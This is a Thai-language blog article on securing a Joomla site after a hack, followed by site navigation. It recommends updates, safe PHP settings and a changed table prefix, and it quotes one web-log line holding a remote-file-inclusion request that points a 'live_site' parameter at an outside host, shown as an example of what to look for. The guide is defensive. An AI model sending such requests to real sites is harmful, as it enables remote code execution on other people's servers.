ทำอย่างไรเมื่อ joomla ถูก Hack!

Joomla
 by Article RatingShare this article to your wall
content split
 
 
ทำอย่างไรเมื่อ joomla ถูก Hack!

ถ้าหากเว็บไซต์ joomla ของคุณถูก Hack สิ่งแรกที่คุณต้องตรวจสอบคือ weblogs หา client requests ที่น่าส่งสัย เช่น: 192.168.0.1 - - [29/Oct/2008:06:07:30 -0500] \\\"GET /index.php?live_site=test.org/1.txt?? HTTP/1.1\\\" 200 10864 \\\"-\\\" \\\"Firefox\\\"

แต่ก็ไม่ใช่เรื่องง่ายที่จะทำการหาต้นตอของการโจมตีเว็บไซต์ joomla ของเรา ซึ่งอาจจะต้องใช้เวลานานในการค้นหาต้นตอดังกล่าว ดังนั้นสิ่งที่นักพัฒนาเว็บไซต์ด้วย Joomla ควรจะต้องรู้คือช่องโหว่ในการโจมตีเว็บไซต์ joomla ของเรา

1. ในการติดตั้ง Joomla รุ่นเก่า หรือ รุ่นก่อนหน้า จะมีช่องโหว่ของระบบความปลอดภัยจำนวนมาก ซึ่งง่ายต่อการ Hack

สามารถตรวจสอบเวอร์ชั่นของ Joomla ได้ด้วยการ Login ที่ admin panel จะบอกถึงรุ่นของ joomla อยู่

หากเวอร์ชั่นของ Joomla ที่ใช้อยู่ไม่ใช่เวอร์ชั่นล่าสุดสามารถทำการ update ได้โดย In case your version is not the latest, you can follow this tutorial:

How to upgrade Joomla


2. การเพิ่มหรือติดตั้ง components / modules ที่ไม่เป็นปัจจุบัน

เป็นสิ่งปกติที่อาจจะโชคร้าย หรือถูกละเลยปัญหานี้ สิ่งสำคัญก่อนทำการติดตั้ง components / modules ต้องแน่ใจว่าเป็น components / modules ที่ update. ตรวจสอบได้จากข้อมูลก่อนดาวน์โหลดจากเว็บไซต์เป็นทางการของ Joomla และคำแนะนำในการติดตั้ง รวมทั้งระบบความปลอดภัยของ components / modules


3. การ config แต่ละส่วนทำให้เกิดช่องโหว่ของระบบความปลอดภัย

- register_globals การตั้งค่า register_globals ใน PHP's configuration - หากตั้งค่าเป็น on เหมือนเป็นการเปิดทางให้ Hacker เข้ามาโจมตีเว็บไซต์ joomla ของเราได้ ดังนั้นควรตรวจสอบให้แน่ใจว่าตั้งค่าของ register_globals เป็น off อยู่เสมอ

- allow_url_includeการตั้งค่า allow_url_include ใน PHP's configuration - หากตั้งค่าเป็น on เป็นการเปิดทางให้ Hacker remote code เข้ามาใน ดังนั้นควรตรวจสอบให้แน่ใจว่าตั้งค่าของ allow_url_include เป็น off อยู่เสมอ

- การใช้คำนำหน้าของตาราง _jos. นี้ก็เป็นอีกช่องทางหนึ่งที่เปิดให้ Hacker ใช้เจาะฐานข้อมูลเราได้ในรูปแบบ MySQL injections สิ่งที่ควรทำคือเปลี่ยน prefix หรือคำนำหน้าของตารางให้ยากต่อการคาดเดา หรืออาจจะใช้ component joomla นี้ ตามลิ้งค์ต่อท้าย this component;

Share this article to your wall
 
ให้คะแนนบทความนี้ :
Rated 2.57/5 (51.35%) (171 Votes)
 content split
***หากบทความนี้เป็นประโยชน์ต่อท่านหรือไม่อย่างไร.. ช่วยให้คะแนนด้านบนด้วยครับ จักขอบคุณยิ่ง***
 Back

ความคิดเห็น
โดย
email
  *กรุณาใส่ Security Code ที่ปรากฏ* 
 

บทความเกี่ยวกับ Joomla

Mobile Version

Registered Member : 42,181
หน้าแรก Bigquery
Wordpress Themes new Wordpress Themes
Free Joomla 1.5 Templates new joomla templates 1.5.x
Free Joomla Templates
Templates Download
Program Download
สารบัญเว็บไซต์
ADVERTISEMENT
ทำเว็บ, สร้างเว็บ
บทความ
บทความ HTML5
บทความ HTML
บทความ CSS
บทความ Joomla
บทความ Tips & Tools
บทความ Script Download
บทความ PHP
บทความ c# .net
บทความ ERROR
บทความ MySQL
บทความ jQuery
Download
Download Joomla! 1.5.x
Download Script
E-Book - VI Editor (Editor for Linux)
apache_1.3.34-win32-x86-no_src
Unlimited Sitemap Generator
HTMLHTML5Templates
Bigquery แนะนำ การเขียนเว็บไซต์ ด้วยการใช้ภาษา php html css webmaster tips & tools   Bigquery แนะนำ การเขียนเว็บไซต์ ด้วยการใช้ภาษา php html css webmaster tips & tools
โพสฟรี ลงโฆษณา มือถือ คอมพิวเตอร์ รถ บ้าน งาน เกมส์ จตุคาม konkeanweb  
แลกลิ้งค์ : bigquery@gmail.com
<a href="http://www.bigquery.com/" target="_blank">
<img src="http://www.bigquery.com/
images/banners/ex/88x31exchange.gif"
alt="Bigquery แนะนำ การเขียนเว็บไซต์ ด้วยการใช้ภาษา php html css webmaster tips &amp; tools" border="0"></a>
** แลกเฉพาะที่ติด banner ไว้หน้าแรกเท่านั้น **
MP3 Download | Gloomy Beary | Bigquery Blog
Bigquery Weblog
Add to Google
Bigquery Wordpress
ขายของมือสอง | ลงประกาศ
bigquery.com Webutation